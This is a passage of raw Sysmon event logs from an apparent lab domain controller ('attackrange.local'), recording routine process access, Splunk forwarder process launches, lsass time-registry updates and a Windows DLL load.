Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.224{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F4-5FCF-4E01-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:04.225{10ACEC4A-85F4-5FCF-4E01-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.895{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5701-000000009101}656C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.895{10ACEC4A-8541-5FCF-1000-000000009101}11562120C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5701-000000009101}656C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.895{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:56:05.817{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exeC:\Windows\SoftwareDistribution\SIH\stage\eng\siheng.dll2020-12-08 13:56:05.817 10341000x80000000000000007852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.770{10ACEC4A-8541-5FCF-1500-000000009101}13644128C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.723{10ACEC4A-8541-5FCF-1500-000000009101}13644128C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:05.723{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000007849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:05.723{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0002e0b1) 13241300x80000000000000007848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:05.723{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6cd61-0x7d26dfcd) 13241300x80000000000000007847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:05.723{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6cd69-0xdeeb47cd) 13241300x80000000000000007846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:56:05.723{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6cd72-0x40afafcd) 10341000x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.707{10ACEC4A-85F5-5FCF-5601-000000009101}47004748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.639{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.639{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-85F5-5FCF-5201-000000009101}4524C:\Windows\System32\sihclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F5-5FCF-5601-000000009101}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5601-000000009101}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.567{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F5-5FCF-5601-000000009101}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.568{10ACEC4A-85F5-5FCF-5601-000000009101}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 